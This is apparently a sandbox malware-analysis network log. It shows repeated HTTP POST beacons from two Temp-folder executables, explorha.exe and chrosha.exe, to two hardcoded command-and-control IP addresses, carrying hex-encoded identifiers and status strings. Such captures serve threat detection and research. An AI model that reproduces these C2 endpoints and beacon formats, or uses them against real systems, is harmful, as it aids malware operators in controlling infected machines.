                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      118192.168.2.549952193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:25.209204912 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:25.457386017 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      119192.168.2.549955193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:25.809533119 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.046732903 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      120192.168.2.549956193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:25.882150888 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.130887985 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.133639097 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.387231112 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      121192.168.2.549957193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.290864944 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.537076950 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      122192.168.2.549958193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.731304884 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.969588995 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.970752001 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:27.213520050 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      123192.168.2.549959193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:26.905539989 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:27.158054113 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      124192.168.2.549960193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:27.404875994 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:27.652173996 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      125192.168.2.549961193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:27.573203087 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:27.816133976 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:27.817336082 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.063870907 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      126192.168.2.549962193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.010478973 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.258400917 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      127192.168.2.549963193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.268959045 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.512623072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      128192.168.2.549964193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.429094076 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.677170992 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.680423975 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.933939934 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      129192.168.2.549965193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:28.868068933 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:29.115343094 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      130192.168.2.549966193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:29.292473078 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:29.538041115 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:29.539248943 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
